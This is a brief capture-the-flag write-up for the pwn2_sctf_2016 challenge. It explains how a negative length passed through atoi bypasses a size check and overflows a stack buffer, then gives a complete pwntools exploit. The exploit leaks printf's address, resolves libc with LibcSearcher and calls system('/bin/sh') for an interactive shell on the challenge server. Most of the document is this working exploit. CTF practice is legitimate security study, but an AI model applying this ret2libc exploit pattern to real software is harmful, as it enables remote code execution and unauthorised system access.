pwn2_sctf_2016
degree of difficulty: 2
source of the challenges:buuctf/sctf_2016
solving ideas:Stack overslow,atoi-function’s negative number overslow
Put it in IDA32,we can see this easy program.
len can be a negative number,witch can lead to that a negative number be overflowed to a int number witch is vary bigger than v5.
Therefore it result in a stack overflow bug .
exp:
from pwn import *
from LibcSearcher import *
#io=process("./pwn2_sctf_2016")
io=remote("node3.buuoj.cn",29069)
elf=ELF("./pwn2_sctf_2016")
context.log_level='debug'
print_got=elf.got['printf']
print_plt=0x8048370
vlun_addr=0x0804852F
#bss=0x0804a040+0x100
#gdb.attach(io,"b *0x080485EE")
io.recvuntil("How many bytes do you want me to read?")
io.sendline("-10")
io.recvuntil("Ok, sounds good.")
print("print_plt:0x%x\nprint_got:0x%x"%(print_plt,print_got))
payload='a'*0x2c+'a'*4+p32(print_plt)+p32(vlun_addr)+p32(print_got)
io.sendline(payload)
io.recvuntil("\x0c\xa0\x04\x08\x0a")#p32(print_got)+'\x0a'
print_addr=u32(io.recv(4))
print("print_addr:0x%x"%print_addr)
libc=LibcSearcher("printf",print_addr)
libc_base=print_addr-libc.dump('printf')
sys_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')
print("sys-addr:0x%x\n"%sys_addr)
io.recvuntil("How many bytes do you want me to read?")
io.sendline("-10")
io.recvuntil("Ok, sounds good.")
payload='a'*0x2c+'a'*4+p32(sys_addr)+p32(vlun_addr)+p32(bin_addr)
io.sendline(payload)
io.interactive()